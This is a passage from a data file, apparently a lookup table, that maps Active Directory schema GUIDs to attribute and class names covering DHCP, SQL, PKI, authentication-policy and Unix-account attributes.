"e215395b-9104-44d9-b894-399ec9e21dfc": "ms-DS-Member-Transitive",
"963d2742-48be-11d1-a9c3-0000f80367c1": "dhcp-Identification",
"bf9679c8-0de6-11d0-a285-00aa003049e2": "Moniker-Display-Name",
"f39b98ac-938d-11d1-aebd-0000f80367c1": "ms-RRAS-Vendor-Attribute-Entry",
"0296c11e-40da-11d1-a9c0-0000f80367c1": "Phone-Mobile-Other",
"bf967a6f-0de6-11d0-a285-00aa003049e2": "USN-Changed",
"b918fe7d-971a-f404-9e21-9261abec970b": "ms-DS-Parent-Dist-Name",
"20af031a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-OLAPDatabase",
"a5679cb0-6f9d-432c-8b75-1e3e834f02aa": "ms-Authz-Central-Access-Policy",
"963d2747-48be-11d1-a9c3-0000f80367c1": "dhcp-Mask",
"1f2ac2c8-3b71-11d2-90cc-00c04fd91ab1": "Move-Tree-State",
"a6f24a23-d65c-4d65-a64f-35fb6873c2b9": "ms-RADIUS-FramedInterfaceId",
"f0f8ffa3-1191-11d0-a060-00aa006c33ed": "Phone-Mobile-Primary",
"bf967a70-0de6-11d0-a285-00aa003049e2": "USN-Created",
"1e02d2ef-44ad-46b2-a67d-9fd18d780bca": "ms-DS-Repl-Value-Meta-Data-Ext",
"963d2754-48be-11d1-a9c3-0000f80367c1": "dhcp-MaxKey",
"998b10f7-aa1a-4364-b867-753d197fe670": "ms-COM-DefaultPartitionLink",
"a4da7289-92a3-42e5-b6b6-dad16d280ac9": "ms-RADIUS-SavedFramedInterfaceId",
"f0f8ffa5-1191-11d0-a060-00aa006c33ed": "Phone-Office-Other",
"bf967a71-0de6-11d0-a285-00aa003049e2": "USN-DSA-Last-Obj-Removed",
"6055f766-202e-49cd-a8be-e52bb159edfb": "ms-DS-Drs-Farm-ID",
"09f0506a-cd28-11d2-9993-0000f87a57d4": "MS-SQL-OLAPCube",
"5ef243a8-2a25-45a6-8b73-08a71ae677ce": "ms-Kds-Prov-ServerConfiguration",
"963d2744-48be-11d1-a9c3-0000f80367c1": "dhcp-Obj-Description",
"430f678b-889f-41f2-9843-203b5a65572f": "ms-COM-ObjectId",
"f63ed610-d67c-494d-87be-cd1e24359a38": "ms-RADIUS-FramedIpv6Prefix",
"f0f8ffa4-1191-11d0-a060-00aa006c33ed": "Phone-Pager-Other",
"a8df7498-c5ea-11d1-bbcb-0080c76670c0": "USN-Intersite",
"b5f1edfe-b4d2-4076-ab0f-6148342b0bf6": "ms-DS-Issuer-Public-Certificates",
"963d2743-48be-11d1-a9c3-0000f80367c1": "dhcp-Obj-Name",
"09abac62-043f-4702-ac2b-6ca15eee5754": "ms-COM-PartitionLink",
"0965a062-b1e1-403b-b48d-5c0eb0e952cc": "ms-RADIUS-SavedFramedIpv6Prefix",
"f0f8ffa6-1191-11d0-a060-00aa006c33ed": "Phone-Pager-Primary",
"bf967a73-0de6-11d0-a285-00aa003049e2": "USN-Last-Obj-Rem",
"60686ace-6c27-43de-a4e5-f00c2f8d3309": "ms-DS-IsManaged",
"ca7b9735-4b2a-4e49-89c3-99025334dc94": "ms-TAPI-Rt-Conference",
"aa02fd41-17e0-4f18-8687-b2239649736b": "ms-Kds-Prov-RootKey",
"963d274f-48be-11d1-a9c3-0000f80367c1": "dhcp-Options",
"67f121dc-7d02-4c7d-82f5-9ad4c950ac34": "ms-COM-PartitionSetLink",
"5a5aa804-3083-4863-94e5-018a79a22ec0": "ms-RADIUS-FramedIpv6Route",
"9c979768-ba1a-4c08-9632-c6a5c1ed649a": "photo",
"167758ad-47f3-11d1-a9c3-0000f80367c1": "USN-Source",
"5315ba8e-958f-4b52-bd38-1349a304dd63": "ms-DS-Cloud-IsManaged",
"963d2753-48be-11d1-a9c3-0000f80367c1": "dhcp-Properties",
"9e6f3a4d-242c-4f37-b068-36b57f9fc852": "ms-COM-UserLink",
"9666bb5c-df9d-4d41-b437-2eec7e27c9b3": "ms-RADIUS-SavedFramedIpv6Route",
"bf9679f7-0de6-11d0-a285-00aa003049e2": "Physical-Delivery-Office-Name",
"4d2fa380-7f54-11d2-992a-0000f87a57d4": "Valid-Accesses",
"78565e80-03d4-4fe3-afac-8c3bca2f3653": "ms-DS-Cloud-Anchor",
"53ea1cb5-b704-4df9-818f-5cb4ec86cac1": "ms-TAPI-Rt-Person",
"7b8b558a-93a5-4af7-adca-c017e67f1057": "ms-DS-Group-Managed-Service-Account",
"963d2748-48be-11d1-a9c3-0000f80367c1": "dhcp-Ranges",
"8e940c8a-e477-4367-b08d-ff2ff942dcd7": "ms-COM-UserPartitionSetLink",
"3532dfd8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Name",
"b7b13119-b82e-11d0-afee-0000f80367c1": "Physical-Location-Object",
"281416df-1968-11d0-a28f-00aa003049e2": "Vendor",
"a1e8b54f-4bd6-4fd2-98e2-bcee92a55497": "ms-DS-Cloud-Issuer-Public-Certificates",
"963d274a-48be-11d1-a9c3-0000f80367c1": "dhcp-Reservations",
"e85e1204-3434-41ad-9b56-e2901228fff0": "MS-DRM-Identity-Certificate",
"48fd44ea-ccee-11d2-9993-0000f87a57d4": "MS-SQL-RegisteredOwner",
"8d3bca50-1d7e-11d0-a081-00aa006c33ed": "Picture",
"bf967a76-0de6-11d0-a285-00aa003049e2": "Version-Number",
"89848328-7c4e-4f6f-a013-28ce3ad282dc": "ms-DS-Cloud-IsEnabled",
"50ca5d7d-5c8b-4ef3-b9df-5b66d491e526": "ms-WMI-IntRangeParam",
"e3c27fdf-b01d-4f4e-87e7-056eef0eb922": "ms-DS-Value-Type",
"963d2745-48be-11d1-a9c3-0000f80367c1": "dhcp-Servers",
"80863791-dbe9-4eb8-837e-7f0ab55d9ac7": "ms-DS-Additional-Dns-Host-Name",
"4f6cbdd8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Contact",
"fc5a9106-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Critical-Extensions",
"7d6c0e9a-7e20-11d0-afd6-00c04fd930c9": "Version-Number-Hi",
"b7acc3d2-2a74-4fa4-ac25-e63fe8b61218": "ms-DS-SyncServerUrl",
"963d2749-48be-11d1-a9c3-0000f80367c1": "dhcp-Sites",
"975571df-a4d5-429a-9f59-cdc6581d91e6": "ms-DS-Additional-Sam-Account-Name",
"561c9644-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Location",
"1ef6336e-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Default-CSPs",
"7d6c0e9b-7e20-11d0-afd6-00c04fd930c9": "Version-Number-Lo",
"de0caa7f-724e-4286-b179-192671efc664": "ms-DS-User-Allowed-To-Authenticate-To",
"292f0d9a-cf76-42b0-841f-b650f331df62": "ms-WMI-IntSetParam",
"2eeb62b3-1373-fe45-8101-387f1676edc7": "ms-DS-Claims-Transformation-Policy-Type",
"963d2752-48be-11d1-a9c3-0000f80367c1": "dhcp-State",
"d3aa4a5c-4e03-4810-97aa-2b339e7a434b": "MS-DS-All-Users-Trust-Quota",
"5b5d448c-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Memory",
"426cae6e-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Default-Key-Spec",
"1f0075fd-7e40-11d0-afd6-00c04fd930c9": "Vol-Table-GUID",
"2c4c9600-b0e1-447d-8dda-74902257bdb5": "ms-DS-User-Allowed-To-Authenticate-From",
"963d2746-48be-11d1-a9c3-0000f80367c1": "dhcp-Subnets",
"8469441b-9ac4-4e45-8205-bd219dbf672d": "ms-DS-Allowed-DNS-Suffixes",
"603e94c4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Build",
"926be278-56f9-11d2-90d0-00c04fd91ab1": "PKI-Enrollment-Access",
"1f0075fb-7e40-11d0-afd6-00c04fd930c9": "Vol-Table-Idx-GUID",
"8521c983-f599-420f-b9ab-b1222bdf95c1": "ms-DS-User-TGT-Lifetime",
"07502414-fdca-4851-b04a-13645b11d226": "ms-WMI-MergeablePolicyTemplate",
"c8fca9b1-7d88-bb4f-827a-448927710762": "ms-DS-Claims-Transformation-Policies",
"963d273b-48be-11d1-a9c3-0000f80367c1": "dhcp-Type",
"800d94d7-b7a1-42a1-b14d-7cae1423d07f": "ms-DS-Allowed-To-Delegate-To",
"64933a3e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-ServiceAccount",
"041570d2-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Expiration-Period",
"34aaa217-b699-11d0-afee-0000f80367c1": "Volume-Count",
"105babe9-077e-4793-b974-ef0410b62573": "ms-DS-Computer-Allowed-To-Authenticate-To",
"963d273a-48be-11d1-a9c3-0000f80367c1": "dhcp-Unique-Key",
"c4af1073-ee50-4be0-b8c0-89a41fe99abe": "ms-DS-Auxiliary-Classes",
"696177a6-ccee-11d2-9993-0000f87a57d4": "MS-SQL-CharacterSet",
"18976af6-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Extended-Key-Usage",
"244b2970-5abd-11d0-afd2-00c04fd930c9": "Wbem-Path",
"2e937524-dfb9-4cac-a436-a5b7da64fd66": "ms-DS-Computer-TGT-Lifetime",
"55dd81c9-c312-41f9-a84d-c6adbdf1e8e1": "ms-WMI-ObjectEncoding",
"641e87a4-8326-4771-ba2d-c706df35e35a": "ms-DS-Cloud-Extensions",
"963d2755-48be-11d1-a9c3-0000f80367c1": "dhcp-Update-Time",
"e185d243-f6ce-4adb-b496-b0c005d7823c": "ms-DS-Approx-Immed-Subordinates",
"6ddc42c0-ccee-11d2-9993-0000f87a57d4": "MS-SQL-SortOrder",
"e9b0a87e-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Key-Usage",
"05308983-7688-11d1-aded-00c04fd8d5cd": "Well-Known-Objects",
"f2973131-9b4d-4820-b4de-0474ef3b849f": "ms-DS-Service-Allowed-To-Authenticate-To",
"bf967953-0de6-11d0-a285-00aa003049e2": "Display-Name",
"3e1ee99c-6604-4489-89d9-84798a89515a": "ms-DS-AuthenticatedAt-DC",
"72dc918a-ccee-11d2-9993-0000f87a57d4": "MS-SQL-UnicodeSortOrder",
"f0bfdefa-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Max-Issuing-Depth",
"bf967a77-0de6-11d0-a285-00aa003049e2": "When-Changed",
"97da709a-3716-4966-b1d1-838ba53c3d89": "ms-DS-Service-Allowed-To-Authenticate-From",
"e2bc80f1-244a-4d59-acc6-ca5c4f82e6e1": "ms-WMI-PolicyTemplate",
"310b55ce-3dcd-4392-a96d-c9e35397c24f": "ms-DS-Device-Registration-Service-Container",
"bf967954-0de6-11d0-a285-00aa003049e2": "Display-Name-Printable",
"e8b2c971-a6df-47bc-8d6f-62770d527aa5": "ms-DS-AuthenticatedTo-Accountlist",
"7778bd90-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Clustered",
"1219a3ec-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Overlap-Period",
"bf967a78-0de6-11d0-a285-00aa003049e2": "When-Created",
"5dfe3c20-ca29-407d-9bab-8421e55eb75c": "ms-DS-Service-TGT-Lifetime",
"9a7ad946-ca53-11d1-bbd0-0080c76670c0": "DIT-Content-Rules",
"503fc3e8-1cc6-461a-99a3-9eee04f402a7": "ms-DS-Az-Application-Data",
"7b91c840-ccee-11d2-9993-0000f87a57d4": "MS-SQL-NamedPipe",
"8447f9f1-1027-11d0-a05f-00aa006c33ed": "PKT",
"bf967a79-0de6-11d0-a285-00aa003049e2": "Winsock-Addresses",
"b23fc141-0df5-4aea-b33d-6cf493077b3f": "ms-DS-Assigned-AuthN-Policy-Silo",
"595b2613-4109-4e77-9013-a3bb4ef277c7": "ms-WMI-PolicyType",
"96bc3a1a-e3d2-49d3-af11-7b0df79d67f5": "ms-DS-Device-Registration-Service",
"fe6136a0-2073-11d0-a9c2-00aa006c33ed": "Division",
"db5b0728-6208-4876-83b7-95d3e5695275": "ms-DS-Az-Application-Name",
"8157fa38-ccee-11d2-9993-0000f87a57d4": "MS-SQL-MultiProtocol",
"8447f9f0-1027-11d0-a05f-00aa006c33ed": "PKT-Guid",
"bf967a7a-0de6-11d0-a285-00aa003049e2": "WWW-Home-Page",
"33140514-f57a-47d2-8ec4-04c4666600c7": "ms-DS-Assigned-AuthN-Policy-Silo-BL",
"f0f8ff8b-1191-11d0-a060-00aa006c33ed": "DMD-Location",
"7184a120-3ac4-47ae-848f-fe0ab20784d4": "ms-DS-Az-Application-Version",
"86b08004-ccee-11d2-9993-0000f87a57d4": "MS-SQL-SPX",
"19405b96-3cfa-11d1-a9c0-0000f80367c1": "Policy-Replication-Flags",
"9a9a0221-4a5b-11d1-a9c3-0000f80367c1": "WWW-Page-Other",
"164d1e05-48a6-4886-a8e9-77a2006e3c77": "ms-DS-AuthN-Policy-Silo-Members",
"45fb5a57-5018-4d0f-9056-997c8c9122d9": "ms-WMI-RangeParam",
"7c9e8c58-901b-4ea8-b6ec-4eb9e9fc0e11": "ms-DS-Device-Container",
"167757b9-47f3-11d1-a9c3-0000f80367c1": "DMD-Name",
"33d41ea8-c0c9-4c92-9494-f104878413fd": "ms-DS-Az-Biz-Rule",
"8ac263a6-ccee-11d2-9993-0000f87a57d4": "MS-SQL-TCPIP",
"281416c4-1968-11d0-a28f-00aa003049e2": "Port-Name",
"bf967a7b-0de6-11d0-a285-00aa003049e2": "X121-Address",
"11fccbc7-fbe4-4951-b4b7-addf6f9efd44": "ms-DS-AuthN-Policy-Silo-Members-BL",
"2df90d86-009f-11d2-aa4c-00c04fd7d83a": "DN-Reference-Update",
"52994b56-0e6c-4e07-aa5c-ef9d7f5a0e25": "ms-DS-Az-Biz-Rule-Language",
"8fda89f4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-AppleTalk",
"bf9679fa-0de6-11d0-a285-00aa003049e2": "Poss-Superiors",
"d07da11f-8a3d-42b6-b0aa-76c962be719a": "x500uniqueIdentifier",
"cd26b9f3-d415-442a-8f78-7c61523ee95b": "ms-DS-User-AuthN-Policy",
"6afe8fe2-70bc-4cce-b166-a96f7359c514": "ms-WMI-RealRangeParam",
"d2b1470a-8f84-491e-a752-b401ee00fe5c": "ms-DS-AuthN-Policy-Silos",
"e0fa1e65-9b45-11d0-afdd-00c04fd930c9": "Dns-Allow-Dynamic",
"013a7277-5c2d-49ef-a7de-b765b36a3f6f": "ms-DS-Az-Class-ID",
"94c56394-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Vines",
"9a7ad94c-ca53-11d1-bbd0-0080c76670c0": "Possible-Inferiors",
"bf967a7f-0de6-11d0-a285-00aa003049e2": "X509-Cert",
"2f17faa9-5d47-4b1f-977e-aa52fabe65c8": "ms-DS-User-AuthN-Policy-BL",
"e0fa1e66-9b45-11d0-afdd-00c04fd930c9": "Dns-Allow-XFR",
"6448f56a-ca70-4e2e-b0af-d20e4ce653d0": "ms-DS-Az-Domain-Timeout",
"9a7d4770-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Status",
"bf9679fb-0de6-11d0-a285-00aa003049e2": "Post-Office-Box",
"612cb747-c0e8-4f92-9221-fdd5f15b550d": "UnixUserPassword",
"afb863c9-bea3-440f-a9f3-6153cc668929": "ms-DS-Computer-AuthN-Policy",
"3c7e6f83-dd0e-481b-a0c2-74cd96ef2a66": "ms-WMI-Rule",
"3a9adf5d-7b97-4f7e-abb4-e5b55c1c06b4": "ms-DS-AuthN-Policies",
"72e39547-7b18-11d1-adef-00c04fd8d5cd": "DNS-Host-Name",
"f90abab0-186c-4418-bb85-88447c87222a": "ms-DS-Az-Generate-Audits",
"9fcc43d4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-LastUpdatedDate",
"bf9679fc-0de6-11d0-a285-00aa003049e2": "Postal-Address",
"850fcc8f-9c6b-47e1-b671-7c654be4d5b3": "UidNumber",
"2bef6232-30a1-457e-8604-7af6dbf131b8": "ms-DS-Computer-AuthN-Policy-BL",
"e0fa1e68-9b45-11d0-afdd-00c04fd930c9": "Dns-Notify-Secondaries",
"665acb5c-bb92-4dbc-8c59-b3638eab09b3": "ms-DS-Az-Last-Imported-Biz-Rule-Path",
"a42cd510-ccee-11d2-9993-0000f87a57d4": "MS-SQL-InformationURL",
"bf9679fd-0de6-11d0-a285-00aa003049e2": "Postal-Code",
"c5b95f0c-ec9e-41c4-849c-b46597ed6696": "GidNumber",
"2a6a6d95-28ce-49ee-bb24-6d1fc01e3111": "ms-DS-Service-AuthN-Policy",
"f1e44bdf-8dd3-4235-9c86-f91f31f5b569": "ms-WMI-ShadowObject",
"f9f0461e-697d-4689-9299-37e61d617b0d": "ms-DS-AuthN-Policy-Silo",
"675a15fe-3b70-11d2-90cc-00c04fd91ab1": "DNS-Property",
"5e53368b-fc94-45c8-9d7d-daf31ee7112d": "ms-DS-Az-LDAP-Query",
"a92d23da-ccee-11d2-9993-0000f87a57d4": "MS-SQL-ConnectionURL",
"bf9679fe-0de6-11d0-a285-00aa003049e2": "Preferred-Delivery-Method",
"a3e03f1f-1d55-4253-a0af-30c2a784e46e": "Gecos",
"2c1128ec-5aa2-42a3-b32d-f0979ca9fcd2": "ms-DS-Service-AuthN-Policy-BL",
"f60a8f96-57c4-422c-a3ad-9e2fa09ce6f7": "ms-DS-Device-MDMStatus",
"e0fa1e69-9b45-11d0-afdd-00c04fd930c9": "Dns-Record",
"cfb9adb7-c4b7-4059-9568-1ed9db6b7248": "ms-DS-Az-Major-Version",
"ae0c11b8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-PublicationURL",
"856be0d0-18e7-46e1-8f5f-7ee4d9020e0d": "preferredLanguage",
"bc2dba12-000f-464d-bf1d-0808465d8843": "UnixHomeDirectory",
"b87a0ad8-54f7-49c1-84a0-e64d12853588": "ms-DS-Assigned-AuthN-Policy",
"6cc8b2b5-12df-44f6-8307-e74f5cdee369": "ms-WMI-SimplePolicyTemplate",
"a11703b7-5641-4d9c-863e-5fb3325e74e0": "ms-DS-GeoCoordinates-Altitude",
"bf967959-0de6-11d0-a285-00aa003049e2": "Dns-Root",
"ee85ed93-b209-4788-8165-e702f51bfbf3": "ms-DS-Az-Minor-Version",
"b222ba0e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSLatitude",
"bf9679ff-0de6-11d0-a285-00aa003049e2": "Preferred-OU",
"a553d12c-3231-4c5e-8adf-8d189697721e": "LoginShell",
"2d131b3c-d39f-4aee-815e-8db4bc1ce7ac": "ms-DS-Assigned-AuthN-Policy-BL",
"dc66d44e-3d43-40f5-85c5-3c12e169927e": "ms-DS-GeoCoordinates-Latitude",
"e0fa1e67-9b45-11d0-afdd-00c04fd930c9": "Dns-Secure-Secondaries",
"a5f3b553-5d76-4cbe-ba3f-4312152cab18": "ms-DS-Az-Operation-ID",
"b7577c94-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSLongitude",
"52458022-ca6a-11d0-afff-0000f80367c1": "Prefix-Map",
"f8f2689c-29e8-4843-8177-e8b98e15eeac": "ShadowLastChange",
"7a560cc2-ec45-44ba-b2d7-21236ad59fd5": "ms-DS-AuthN-Policy-Enforced",
"ab857078-0142-4406-945b-34c9b6b13372": "ms-WMI-Som",
"94c42110-bae4-4cea-8577-af813af5da25": "ms-DS-GeoCoordinates-Longitude",
"d5eb2eb7-be4e-463b-a214-634a44d7392e": "DNS-Tombstoned",
"515a6b06-2617-4173-8099-d5605df043c6": "ms-DS-Az-Scope-Name",
"bcdd4f0e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSHeight",
"a8df744b-c5ea-11d1-bbcb-0080c76670c0": "Presentation-Address",
"a76b8737-e5a1-4568-b057-dc12e04be4b2": "ShadowMin",
"f2f51102-6be0-493d-8726-1546cdbc8771": "ms-DS-AuthN-Policy-Silo-Enforced",
"bd29bf90-66ad-40e1-887b-10df070419a6": "ms-DS-External-Directory-Object-Id",
"f18a8e19-af5f-4478-b096-6f35c27eb83f": "documentAuthor",
"2629f66a-1f95-4bf3-a296-8e9d7b9e30c8": "ms-DS-Az-Script-Engine-Cache-Max",
"c07cc1d0-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Version",
"963d2739-48be-11d1-a9c3-0000f80367c1": "Previous-CA-Certificates",
"f285c952-50dd-449e-9160-3b880d99988d": "ShadowMax",
"0bc579a2-1da7-4cea-b699-807f3b9d63a4": "ms-WMI-StringSetParam",
"0b21ce82-ff63-46d9-90fb-c8b9f24e97b9": "documentIdentifier",
"87d0fb41-2c8b-41f6-b972-11fdfd50d6b0": "ms-DS-Az-Script-Timeout",
"c57f72f4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Language",
"963d273d-48be-11d1-a9c3-0000f80367c1": "Previous-Parent-CA",
"7ae89c9c-2976-4a46-bb8a-340f88560117": "ShadowWarning",
"2628a46a-a6ad-4ae0-b854-2b12d9fe6f9e": "account",
"bf967aa1-0de6-11d0-a285-00aa003049e2": "Mail-Recipient",
"b958b14e-ac6d-4ec4-8892-be70b69f7281": "documentLocation",
"7b078544-6c82-4fe9-872f-ff48ad2b2e26": "ms-DS-Az-Task-Is-Role-Definition",
"8386603c-ccef-11d2-9993-0000f87a57d4": "MS-SQL-Description",
"bf967a00-0de6-11d0-a285-00aa003049e2": "Primary-Group-ID",
"86871d1f-3310-4312-8efd-af49dcfb2671": "ShadowInactive",
"bf967a83-0de6-11d0-a285-00aa003049e2": "Class-Schema",
"d9a799b2-cef3-48b3-b5ad-fb85f8dd3214": "ms-WMI-UintRangeParam",
"59527d0f-b7c0-4ce2-a1dd-71cef6963292": "ms-DS-Is-Compliant",
"170f09d7-eb69-448a-9a30-f1afecfd32d7": "documentPublisher",
"8491e548-6c38-4365-a732-af041569b02c": "ms-DS-Az-Object-Guid",
"ca48eba8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Type",
"c0ed8738-7efd-4481-84d9-66d2db8be369": "Primary-Group-Token",
"75159a00-1fff-4cf4-8bff-4ef2695cf643": "ShadowExpire",
"d1328fbc-8574-4150-881d-0b1088827878": "ms-DS-Key-Principal-BL",
"de265a9c-ff2c-47b9-91dc-6e6fe2c43062": "documentTitle",
"b5f7e349-7a5b-407c-a334-a31c3f538b98": "ms-DS-Az-Generic-Data",
"d0aedb2e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-InformationDirectory",
"281416d7-1968-11d0-a28f-00aa003049e2": "Print-Attributes",
"8dfeb70d-c5db-46b6-b15e-a4389e6cee9b": "ShadowFlag",
"7f561288-5301-11d1-a9c5-0000f80367c1": "ACS-Policy",
"8f4beb31-4e19-46f5-932e-5fa03c339b1d": "ms-WMI-UintSetParam",
"c4a46807-6adc-4bbb-97de-6bed181a1bfe": "ms-DS-Device-Trust-Type",
"94b3a8a9-d613-4cec-9aad-5fbcc1046b43": "documentVersion",
"d31a8757-2447-4545-8081-3bb610cacbf2": "ms-DS-Behavior-Version",
"d5a0dbdc-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Database",
"281416cd-1968-11d0-a28f-00aa003049e2": "Print-Bin-Names",
"03dab236-672e-4f61-ab64-f77d2dc2ffab": "MemberUid",
"1dcc0722-aab0-4fef-956f-276fe19de107": "ms-DS-Shadow-Principal-Sid",
"7bfdcb7a-4807-11d1-a9c3-0000f80367c1": "Domain-Certificate-Authorities",
"f0d8972e-dd5b-40e5-a51d-044c7c17ece7": "ms-DS-Byte-Array",
"db77be4a-ccee-11d2-9993-0000f87a57d4": "MS-SQL-AllowAnonymousSubscription",
"281416d2-1968-11d0-a28f-00aa003049e2": "Print-Collate",
"0f6a17dc-53e5-4be8-9442-8f3ce2f9012a": "MemberNisNetgroup",
"2e899b04-2834-11d3-91d4-0000f87a57d4": "ACS-Resource-Limits",
"b82ac26b-c6db-4098-92c6-49c18a3336e1": "ms-WMI-UnknownRangeParam",
"19195a55-6da0-11d0-afd3-00c04fd930c9": "Domain-Component",
"69cab008-cdd4-4bc9-bab8-0ff37efe1b20": "ms-DS-Cached-Membership",
"e0c6baae-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Alias",
"281416d3-1968-11d0-a28f-00aa003049e2": "Print-Color",
"a8032e74-30ef-4ff5-affc-0fc217783fec": "NisNetgroupTriple",
"11f95545-d712-4c50-b847-d2781537c633": "ms-DS-Shadow-Principal-Container",
"b000ea7b-a086-11d0-afdd-00c04fd930c9": "Domain-Cross-Ref",
"3566bf1f-beee-4dcb-8abe-ef89fcfec6c1": "ms-DS-Cached-Membership-Time-Stamp",
"e9098084-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Size",
"281416cc-1968-11d0-a28f-00aa003049e2": "Print-Duplex-Supported",
"ff2daebf-f463-495a-8405-3e483641eaa2": "IpServicePort",
"7f561289-5301-11d1-a9c5-0000f80367c1": "ACS-Subnet",
"05630000-3927-4ede-bf27-ca91f275c26f": "ms-WMI-WMIGPO",
"963d2734-48be-11d1-a9c3-0000f80367c1": "Domain-ID",
"23773dc2-b63a-11d2-90e1-00c04fd91ab1": "MS-DS-Consistency-Guid",
"ede14754-ccee-11d2-9993-0000f87a57d4": "MS-SQL-CreationDate",
"281416ca-1968-11d0-a28f-00aa003049e2": "Print-End-Time",
"cd96ec0b-1ed6-43b4-b26b-f170b645883f": "IpServiceProtocol",
"770f4cb3-1643-469c-b766-edd77aa75e14": "ms-DS-Shadow-Principal",
"7f561278-5301-11d1-a9c5-0000f80367c1": "Domain-Identifier",
"178b7bc2-b63a-11d2-90e1-00c04fd91ab1": "MS-DS-Consistency-Child-Count",
"f2b6abca-ccee-11d2-9993-0000f87a57d4": "MS-SQL-LastBackupDate",
"281416cb-1968-11d0-a28f-00aa003049e2": "Print-Form-Name",
"ebf5c6eb-0e2d-4415-9670-1081993b4211": "IpProtocolNumber",
"3e74f60f-3e73-11d1-a9c0-0000f80367c1": "Address-Book-Container",
"9a0dc344-c100-11d1-bbc5-0080c76670c0": "MSMQ-Configuration",
"c294f84b-2fad-4b71-be4c-9fc5701f60ba": "ms-DS-Key-Id",
"bf96795d-0de6-11d0-a285-00aa003049e2": "Domain-Policy-Object",
"c5e60132-1480-11d3-91c1-0000f87a57d4": "MS-DS-Creator-SID",
"f6d6dd88-ccee-11d2-9993-0000f87a57d4": "MS-SQL-LastDiagnosticDate",
"ba305f6d-47e3-11d0-a1a6-00c04fd930c9": "Print-Keep-Printed-Jobs",
"966825f5-01d9-4a5c-a011-d15ae84efa55": "OncRpcNumber",
"a12e0e9f-dedb-4f31-8f21-1311b958182f": "ms-DS-Key-Material",
"80a67e2a-9f22-11d0-afdd-00c04fd930c9": "Domain-Policy-Reference",
"234fcbd8-fb52-4908-a328-fd9f6e58e403": "ms-DS-Date-Time",
"fbcda2ea-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Applications",
"281416d6-1968-11d0-a28f-00aa003049e2": "Print-Language",
"de8bb721-85dc-4fde-b687-9657688e667e": "IpHostNumber",
"5fd4250a-1262-11d0-a060-00aa006c33ed": "Address-Template",
"876d6817-35cc-436c-acea-5ef7174dd9be": "MSMQ-Custom-Recipient",
"de71b44c-29ba-4597-9eca-c3348ace1917": "ms-DS-Key-Usage",
"bf96795e-0de6-11d0-a285-00aa003049e2": "Domain-Replica",
"6818f726-674b-441b-8a3a-f40596374cea": "ms-DS-Default-Quota",
"01e9a98a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-Keywords",
"ba305f7a-47e3-11d0-a1a6-00c04fd930c9": "Print-MAC-Address",
"4e3854f4-3087-42a4-a813-bb0c528958d3": "IpNetworkNumber",
"bd61253b-9401-4139-a693-356fc400f3ea": "ms-DS-Key-Principal",
"80a67e29-9f22-11d0-afdd-00c04fd930c9": "Domain-Wide-Policy",
"a9b38cb6-189a-4def-8a70-0fcfa158148e": "ms-DS-Deleted-Object-Lifetime",
"c1676858-d34b-11d2-999a-0000f87a57d4": "MS-SQL-Publisher",
"281416d1-1968-11d0-a28f-00aa003049e2": "Print-Max-Copies",
"6ff64fcd-462e-4f62-b44a-9a5347659eb9": "IpNetmaskNumber",
"3fdfee4f-47f4-11d1-a9c3-0000f80367c1": "Application-Entity",
"9a0dc345-c100-11d1-bbc5-0080c76670c0": "MSMQ-Enterprise-Settings",
"642c1129-3899-4721-8e21-4839e3988ce5": "ms-DS-Device-DN",
"1a1aa5b5-262e-4df6-af04-2cf6b0d80048": "drink",
"2143acca-eead-4d29-b591-85fa49ce9173": "ms-DS-DnsRootAlias",
"c3bb7054-d34b-11d2-999a-0000f87a57d4": "MS-SQL-AllowKnownPullSubscription",
"281416cf-1968-11d0-a28f-00aa003049e2": "Print-Max-Resolution-Supported",
"e6a522dd-9770-43e1-89de-1de5044328f7": "MacAddress",
"dffbd720-0872-402e-9940-fcd78db049ba": "ms-DS-Computer-SID",
"281416c5-1968-11d0-a28f-00aa003049e2": "Driver-Name",
"5706aeaf-b940-4fb2-bcfc-5268683ad9fe": "ms-DS-Enabled-Feature",
"c4186b6e-d34b-11d2-999a-0000f87a57d4": "MS-SQL-AllowImmediateUpdatingSubscription",
"ba305f6f-47e3-11d0-a1a6-00c04fd930c9": "Print-Max-X-Extent",
"d72a0750-8c7c-416e-8714-e65f11e908be": "BootParameter",
"5fd4250b-1262-11d0-a060-00aa006c33ed": "Application-Process",
"46b27aac-aafa-4ffb-b773-e5bf621ee87b": "MSMQ-Group",
"b6e5e988-e5e4-4c86-a2ae-0dacb970a0e1": "ms-DS-Custom-Key-Information",
"ba305f6e-47e3-11d0-a1a6-00c04fd930c9": "Driver-Version",
"ce5b01bc-17c6-44b8-9dc1-a9668b00901b": "ms-DS-Enabled-Feature-BL",
"c458ca80-d34b-11d2-999a-0000f87a57d4": "MS-SQL-AllowQueuedUpdatingSubscription",
"ba305f70-47e3-11d0-a1a6-00c04fd930c9": "Print-Max-Y-Extent",
